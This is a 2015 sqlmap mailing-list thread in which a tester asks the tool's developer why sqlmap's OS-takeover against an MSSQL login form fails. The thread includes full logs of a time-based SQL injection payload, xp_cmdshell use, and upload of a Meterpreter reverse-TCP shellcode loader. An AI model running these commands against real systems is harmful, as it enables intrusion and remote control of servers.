Hi
This time I tried --flush-session as well and now it is showing that the
parameter is not injectable; however when I'm using old session with (-s
old_sessionfile.sqlite) it is not showing this.
Observed similar issue when few days back I tried to sqlinject same
vulnerable parameter using sqlmap from Computer-2; it failed to identify
vulnerability in target parameter; however at the same time it was working
with Computer-1. Did tried --time-sec, -o etc. This is another weird issue
in addition to OS Pwning.
--start--
sqlmap -r mytarget_login -p testNumber --os-pwn
--msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf_newSession -v 2
--fresh-queries --flush-session
..
..
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40
columns' because the level (4) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 31
to 40 columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50
columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 41
to 50 columns' because the level (5) is higher than the provided (1)
[05:20:28] [WARNING] POST parameter 'testNumber' is not injectable
[05:20:28] [CRITICAL] all tested parameters appear to be not injectable.
Try to increase '--level'/'--risk' values to perform more tests. Also, you
can try to rerun by providing either a valid value for option '--string'
(or '--regexp') If you suspect that there is some kind of protection
mechanism involved (e.g. WAF) maybe you could retry with an option
'--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 05:20:28
--end--
On Thu, Jul 2, 2015 at 2:11 PM, Miroslav Stampar <miroslav.stam...@gmail.com
> wrote:
> In your case, 404 is indication that file has not been found in the
> expected place.
>
> Now I see that the temporary file path is not being "refreshed" by the
> --fresh-queries. Please rerun the whole case with the --flush-session
>
> Bye
>
> p.s. in your case sqlmap tried to upload the file to the trashy location
> because of previously retrieved faulty temp location
>
> On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <mypentest...@gmail.com>
> wrote:
>
>> Hi,
>> Thanks for your reply.
>>
>> This time I tried with --fresh-queries without specific --techniques.
>>
>> why am I getting error "page not found (404)" again and again? Does it
>> indicate that file is being written but is deleted by Anti-Virus control or
>> something and that's why while calling the uploaded file 404 error is
>> appearing, Can this be the case ? Need your opinion and expertise.
>>
>>
>> Thanks
>>
>>
>> --start---
>>
>> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn
>> --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
>>
>>
>> which payload do you want to use?
>> [1] Meterpreter (default)
>> [2] Shell
>> [3] VNC
>> > 1
>> [11:12:52] [DEBUG] executing local command:
>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>> EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R |
>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o
>> "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
>> [11:12:52] [INFO] creation in progress .................. done
>> [11:13:10] [DEBUG] the shellcode size is 308 bytes
>> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
>> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
>> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL
>> injection technique
>> [11:13:10] [INFO] using PowerShell to write the binary file content to
>> file 'D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
>> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program
>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt,
>> please wait..
>> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to
>> D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
>> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to
>> write the D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
>> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier
>> names you are advised to rerun with '--tamper=charunicodeencode'
>> [11:13:12] [DEBUG] checking the length of the remote file D:\Program
>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
>> [11:13:12] [INFO] retrieved:
>> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
>> [11:13:13] [WARNING] it looks like the file has not been written (usually
>> occurs if the DBMS process' user has no write privileges in the destination
>> path)
>> do you want to try to upload the file with the custom Visual Basic script
>> technique? [Y/n] y
>> [11:13:15] [INFO] using a custom visual basic script to write the binary
>> file content to file 'D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
>> [11:13:15] [DEBUG] uploading the file base64-encoded content to
>> D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait..
>> [11:13:16] [CRITICAL] page not found (404)
>> [11:13:16] [WARNING] HTTP error codes detected during run:
>> 404 (Not Found) - 1 times
>> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>> that some kind of protection is involved (e.g. WAF)
>>
>> [*] shutting down at 11:13:16
>>
>>
>> --end---
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <
>> miroslav.stam...@gmail.com> wrote:
>>
>>> Hi.
>>>
>>> 1) First of all, please don't restrain sqlmap to only use "stacked"
>>> SQLi. That way you'll kill the possibility to get perfectly valid results
>>> with other techniques
>>> 2) In current state, you've got some "trashy" characters (because of
>>> combination of laggy connection and stacked SQLi), like: "D:/Program
>>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
>>> --fresh-queries in such situations (once per run where you expect resume of
>>> trashy chars) to force sqlmap to try to retrieve the problematic value once
>>> again.
>>>
>>> Bye
>>>
>>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <mypentest...@gmail.com>
>>> wrote:
>>>
>>>> Hi All,
>>>>
>>>> In first phase of our test we discovered Target URL is vulnerable and
>>>> we managed to retrieved lots of information such as --users, --dbs, some of
>>>> --tables and lots more. All this retrieval was very slow probably due to
>>>> time-based vulnerability; however tried through all (BEUSTQ) and found same
>>>> state.
>>>>
>>>> During an attempt after few days of our success we noticed some of the
>>>> parameter is not working and we are receiving errors like for instance
>>>> during requery for --users we received error "[09:39:23] [CRITICAL] unable
>>>> to retrieve the number of database users". During requery for -U sa
>>>> --passwords we received "unnable to retrieve the password hashes for the
>>>> database users (probably because the session user has no read privileges
>>>> over the relevant system database table)".
>>>>
>>>> We moved to OS takeover, initially get error for xp_cmdshell however
>>>> activated and confirmed using SQLNinja and moved on to get --os-shell,
>>>> executed some of commands like "hostname", "whoami" and successfully
>>>> retrieved its output.
>>>>
>>>> Now after few minutes we noted that we are not getting any output of
>>>> any command with message "No output".
>>>>
>>>> We moved to --os-pwn + --msf-path, But again with no success on
>>>> meterpreter or VNC.
>>>> received error "HTTP error codes detected during run:
>>>> 404 (Not Found) - 1 times"
>>>>
>>>> I'm attaching screen log, please help me with this if thr is any scope
>>>> available.
>>>> Thanks in Advance.
>>>>
>>>>
>>>>
>>>> -------screen logs start-------
>>>>
>>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
>>>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
>>>> test_msf7 -v 2
>>>> _
>>>> ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150519}
>>>> |_ -| . | | | .'| . |
>>>> |___|_ |_|_|_|_|__,| _|
>>>> |_| |_| http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by this
>>>> program
>>>>
>>>> [*] starting at 10:03:33
>>>>
>>>> mytarget_login
>>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>>>> [10:03:33] [DEBUG] not a valid WebScarab log data
>>>> [10:03:33] [DEBUG] cleaning up configuration parameters
>>>> test_msf7
>>>> mytarget_login
>>>> /opt/metasploit/apps/pro/msf3
>>>> [10:03:33] [INFO] setting file for logging HTTP traffic
>>>> [10:03:33] [DEBUG] setting the HTTP timeout
>>>> [10:03:33] [DEBUG] creating HTTP requests opener object
>>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>>>> [10:03:33] [DEBUG] provided Metasploit Framework path
>>>> '/opt/metasploit/apps/pro/msf3' is valid
>>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the
>>>> Cookie
>>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>>>> [10:03:33] [INFO] testing connection to the target URL
>>>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>>>> sqlmap got a 302 redirect to '
>>>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
>>>> follow? [Y/n] Y
>>>> redirect is a result of a POST request. Do you want to resend original
>>>> POST data to a new location? [Y/n] Y
>>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104]
>>>> Connection reset by peer')
>>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by
>>>> some kind of WAF/IPS/IDS
>>>> sqlmap identified the following injection points with a total of 0
>>>> HTTP(s) requests:
>>>> ---
>>>> Parameter: testNumber (POST)
>>>> Type: stacked queries
>>>> Title: Microsoft SQL Server/Sybase stacked queries
>>>> Payload:
>>>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
>>>> WAITFOR DELAY '0:0:5'--&testPassword=3243
>>>> Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>>>> ---
>>>> [10:03:56] [INFO] testing Microsoft SQL Server
>>>> [10:03:56] [INFO] confirming Microsoft SQL Server
>>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>>>> back-end DBMS: Microsoft SQL Server 2008
>>>> how do you want to establish the tunnel?
>>>> [1] TCP: Metasploit Framework (default)
>>>> [2] ICMP: icmpsh - ICMP tunneling
>>>> > 1
>>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
>>>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>>>> [10:04:00] [INFO] testing if current user is DBA
>>>> [10:04:00] [DEBUG] creating a support table to write commands standard
>>>> output to
>>>> [10:04:00] [WARNING] time-based comparison requires larger statistical
>>>> model, please wait..............................
>>>> [10:04:04] [WARNING] it is very important not to stress the network
>>>> adapter during usage of time-based payloads to prevent potential errors
>>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you
>>>> are advised to try a switch '--no-cast' or switch '--hex'
>>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>>>> which connection type do you want to use?
>>>> [1] Reverse TCP: Connect back from the database host to this machine
>>>> (default)
>>>> [2] Reverse TCP: Try to connect back from the database host to this
>>>> machine, on all ports example3ween the specified and 65535
>>>> [3] Reverse HTTP: Connect back from the database host to this machine
>>>> tunnelling traffic over HTTP
>>>> [4] Reverse HTTPS: Connect back from the database host to this machine
>>>> tunnelling traffic over HTTPS
>>>> [5] Bind TCP: Listen on the database host for a connection
>>>> > 1
>>>> what is the local address? [192.168.1.8]
>>>> which local port number do you want to use? [61371]
>>>> which payload do you want to use?
>>>> [1] Meterpreter (default)
>>>> [2] Shell
>>>> [3] VNC
>>>> > 1
>>>> [10:04:17] [DEBUG] executing local command:
>>>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>>>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
>>>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
>>>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>>>> [10:04:17] [INFO] creation in progress .................. done
>>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program
>>>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query
>>>> SQL injection technique
>>>> [10:04:35] [INFO] using PowerShell to write the binary file content to
>>>> file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>>> Ā\tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
>>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt,
>>>> please wait..
>>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
>>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>>> Ā\tmppsbcbi.ps1
>>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to
>>>> write the D:\Program Files\Microsoft SQL
>>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>>>> [10:04:37] [WARNING] if you experience problems with non-ASCII
>>>> identifier names you are advised to rerun with '--tamper=charunicodeencode'
>>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program
>>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>>>> [10:04:37] [INFO] retrieved:
>>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:37] [WARNING] it looks like the file has not been written
>>>> (usually occurs if the DBMS process' user has no write privileges in the
>>>> destination path)
>>>> do you want to try to upload the file with the custom Visual Basic
>>>> script technique? [Y/n] Y
>>>> [10:04:41] [INFO] using a custom visual basic script to write the
>>>> binary file content to file 'D:\Program Files\Microsoft SQL
>>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to
>>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>>> Ā\tmpfegab.txt, please wait..
>>>> [10:04:41] [CRITICAL] page not found (404)
>>>> [10:04:41] [WARNING] HTTP error codes detected during run:
>>>> 404 (Not Found) - 1 times
>>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>>>> that some kind of protection is involved (e.g. WAF)
>>>>
>>>> [*] shutting down at 10:04:41
>>>>
>>>> root@kali:~#
>>>>
>>>>
>>>> -------screen logs end-------
>>>>
>>>>
>>>> Please help!!
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Don't Limit Your Business. Reach for the Cloud.
>>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>>> you need to offload your IT needs and focus on growing your business.
>>>> Configured For All Businesses. Start Your Cloud Today.
>>>> https://www.gigenetcloud.com/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sqlmap-users@lists.sourceforge.net
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
------------------------------------------------------------------------------
Don't Limit Your Business. Reach for the Cloud.
GigeNET's Cloud Solutions provide you with the tools and support that
you need to offload your IT needs and focus on growing your business.
Configured For All Businesses. Start Your Cloud Today.
https://www.gigenetcloud.com/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
